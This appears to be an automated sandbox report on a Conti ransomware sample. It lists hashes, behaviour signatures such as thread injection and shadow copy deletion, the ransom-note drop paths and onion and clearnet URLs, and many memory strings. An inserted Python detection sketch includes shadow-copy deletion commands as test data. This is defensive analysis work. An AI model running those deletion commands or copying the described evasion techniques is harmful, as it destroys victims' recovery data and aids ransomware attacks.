Analysis Report 7906dc47_by_Libranalysis

Overview

General Information

Sample Name: 7906dc47_by_Libranalysis (renamed file extension from none to exe)
Analysis ID: 419877
MD5: 7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1: e7304e2436dc0eddddba229f1ec7145055030151
SHA256: 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Detection

Conti
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found ransom note / readme
Multi AV Scanner detection for submitted file
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Yara detected Conti ransomware
Contains functionality to create processes via WMI
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes shadow drive data (may be related to ransomware)
Found Tor onion address
Maps a DLL or memory area into another process
Modifies existing user documents (likely ransomware behavior)
Modifies the context of a thread in another process (thread injection)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Copying Sensitive Files with Credential Data
Sigma detected: Suspicious Svchost Process
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Shadow Copies Creation Using Operating Systems Utilities
Uses code obfuscation techniques (call, push, ret)
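The signature list above names three Sigma process-creation rules (shadow copy deletion and creation via operating-system utilities, and a svchost.exe started by something other than its normal parent). The block below is an added example, not part of the Joe Sandbox report and not the Sigma project's own rule files: it approximates the selection logic of those three rules in Python and runs it over a handful of constructed Sysmon Event ID 1 style records. The command lines, parent paths and the GUID in the sample events are made up for illustration; the report itself does not show the commands this sample ran.

```python
import ntpath

# Constructed Sysmon Event ID 1 style records for illustration only; these
# are NOT the commands recorded by the sandbox (the report does not list them).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic shadowcopy where \"ID='{3F2504E0-4F89-11D3-9A0C-0305E82C3301}'\" delete"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe",
     "CommandLine": "svchost.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin.exe Create Shadow /For=C:"},
]


def _base(path):
    """Lower-cased file name of a Windows path (Image / ParentImage fields)."""
    return ntpath.basename(path).lower()


# Approximation of the public Sigma rule "Shadow Copies Deletion Using
# Operating Systems Utilities": the tools that can remove shadow copies plus
# the 'delete' keyword, the vssadmin shadow-storage resize trick, and wbadmin
# catalog deletion.  The upstream rule carries more variants; this is a subset.
def shadow_copies_deletion(ev):
    img, cmd = _base(ev["Image"]), ev["CommandLine"].lower()
    if img in {"vssadmin.exe", "wmic.exe", "diskshadow.exe",
               "powershell.exe", "pwsh.exe"}:
        if "shadow" in cmd and "delete" in cmd:
            return True
        if img == "vssadmin.exe" and "resize" in cmd and "shadowstorage" in cmd:
            return True
    return img == "wbadmin.exe" and "delete" in cmd and "catalog" in cmd


# Approximation of "Shadow Copies Creation Using Operating Systems Utilities".
def shadow_copies_creation(ev):
    img, cmd = _base(ev["Image"]), ev["CommandLine"].lower()
    return img in {"vssadmin.exe", "wmic.exe"} and "shadow" in cmd and "create" in cmd


# Parents that legitimately start svchost.exe; anything else is suspicious.
# This list is an assumption for the example, not the upstream rule's filter.
LEGIT_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe",
                         "svchost.exe", "rpcnet.exe", "ngen.exe", "tiworker.exe"}


# Approximation of "Suspicious Svchost Process".
def suspicious_svchost(ev):
    return (_base(ev["Image"]) == "svchost.exe"
            and _base(ev["ParentImage"]) not in LEGIT_SVCHOST_PARENTS)


RULES = {
    "shadow_copies_deletion": shadow_copies_deletion,
    "shadow_copies_creation": shadow_copies_creation,
    "suspicious_svchost": suspicious_svchost,
}


def evaluate(events):
    """Return (event index, rule name) pairs for every rule that matches."""
    hits = []
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((i, name))
    return hits


if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name} <- {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The benign record (svchost.exe under services.exe) produces no hit, which is the point of the parent check: in this report the payload ran inside sihost.exe, svchost.exe and taskhostw.exe after being started suspended and injected, so the parent of those hosts is what gives them away, not the image name. For production use, take the upstream Sigma rules directly; they cover more deletion variants and carry exclusion filters this sketch omits.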

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: 7906dc47_by_Libranalysis.exe Virustotal: Detection: 42%
Found ransom note / readme
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe File created: C:\Users\Public\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\GAOBCVIQIJ\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\IPKGELNTQY\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\LSBIHQFDVT\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\NEBFQQYWPS\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\GAOBCVIQIJ\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\IPKGELNTQY\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\LSBIHQFDVT\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\NEBFQQYWPS\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Downloads\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\Public\readme.txt
Source: C:\Windows\System32\svchost.exe File created: C:\Users\Public\readme.txt
Source: C:\Windows\System32\svchost.exe File created: C:\Users\Public\readme.txt
Source: C:\Windows\System32\taskhostw.exe File created: C:\Users\Public\readme.txt
Source: 7906dc47_by_Libranalysis.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB058206B2 FindFirstFileExW, 2_2_000001BB058206B2
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB058906B2 GlobalAlloc,FindFirstFileExW, 2_2_000001BB058906B2
Source: C:\Windows\System32\sihost.exe Code function: 3_2_0000024D2C4106B2 FindFirstFileExW, 3_2_0000024D2C4106B2
Source: C:\Windows\System32\svchost.exe Code function: 4_2_0000024843FF06B2 FindFirstFileExW, 4_2_0000024843FF06B2
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000020A025A06B2 FindFirstFileExW, 11_2_0000020A025A06B2
Source: C:\Windows\System32\taskhostw.exe Code function: 30_2_00000255F9EB06B2 FindFirstFileExW, 30_2_00000255F9EB06B2
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB0582016A CreateMutexW,GetVolumeInformationW,GetLogicalDriveStringsW, 2_2_000001BB0582016A

Networking:

Found Tor onion address
Source: readme.txt.3.dr String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
Source: readme.txt.3.dr String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.boxgas.icu/eltalkfzj
Source: readme.txt.3.dr String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.jobsbig.cam/eltalkfzj
Source: readme.txt.3.dr String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.nowuser.casa/eltalkfzj
Source: readme.txt.3.dr String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.sixsees.club/eltalkfzj
Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmp String found in binary or memory: http://amplify-imp.outbrain.com/pixel?p=nlV1YHXXXKgnJTkmjxGkpD86h377hQIinq23IJiX9nqxEkupAtbFH4fSP0Iz
Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmp String found in binary or memory: http://b1-use2.zemanta.com/bidder/win/outbrainrtb/c333bcb0-98dc-11e9-8919-320929a4a620/0.564833/3F66
Source: taskhostw.exe, 0000001E.00000000.272214815.00000255F9E88000.00000008.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.272901005.00000255FA2F8000.00000002.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: taskhostw.exe, 0000001E.00000000.272214815.00000255F9E88000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: taskhostw.exe, 0000001E.00000000.272214815.00000255F9E88000.00000008.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp String found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA61Ofl?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv9IZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhNP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhax?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvqEs?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvuGs?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvzqT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBS0Ogx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuaWG?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.272214815.00000255F9E88000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0B
Source: taskhostw.exe, 0000001E.00000000.273154978.00000255FA358000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0E
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0F
Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0K
Source: taskhostw.exe, 0000001E.00000000.272827800.00000255FA2C8000.00000008.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0M
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: taskhostw.exe, 0000001E.00000002.501238733.00000255FA2F0000.00000008.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: taskhostw.exe, 0000001E.00000000.273188144.00000255FA370000.00000008.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: taskhostw.exe, 0000001E.00000002.501710586.00000255FA398000.00000002.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
Source: taskhostw.exe, 0000001E.00000002.500148816.00000255F9E18000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: taskhostw.exe, 0000001E.00000002.500148816.00000255F9E18000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
